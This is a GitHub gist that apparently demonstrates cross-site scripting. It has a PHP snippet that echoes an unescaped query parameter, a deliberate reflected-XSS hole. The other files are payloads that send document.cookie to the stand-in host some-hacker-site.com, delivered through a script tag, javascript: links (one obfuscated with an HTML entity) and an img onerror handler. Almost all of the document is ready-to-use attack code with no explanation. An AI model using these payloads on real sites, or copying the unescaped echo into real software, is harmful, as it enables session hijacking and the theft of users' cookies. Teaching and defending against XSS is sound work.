Skip to content

Instantly share code, notes, and snippets.

@ElyDotDev

ElyDotDev/attack-1-reflected.php Secret

Last active July 1, 2017 18:15
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save ElyDotDev/4afb7b35e77d9a43db8af43fdf64f7f8 to your computer and use it in GitHub Desktop.
Save ElyDotDev/4afb7b35e77d9a43db8af43fdf64f7f8 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
attack-1-reflected.php
<?php
echo 'Search result for: ' . $_GET['query'];
// Other codes for showing search results
Raw
attack-1.html
<script>
window.location = 'http://some-hacker-site.com/submit-cookie?cookie=' + document.cookie;
</script>
Raw
attack-2-1.html
<a href="javascript:window.location = 'http://some-hacker-site.com/submit-cookie?cookie=' + document.cookie;">
Check My Awsome Website!
</a>
Raw
attack-2-2.html
<a href="j&#X41vascript:window.location = 'http://some-hacker-site.com/submit-cookie?cookie=' + document.cookie;">
Check My Awsome Website!
</a>
Raw
attack-3-1.html
<img src="not-found-img-url" onerror="window.location = 'http://some-hacker-site.com/submit-cookie?cookie=' + document.cookie;" />
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment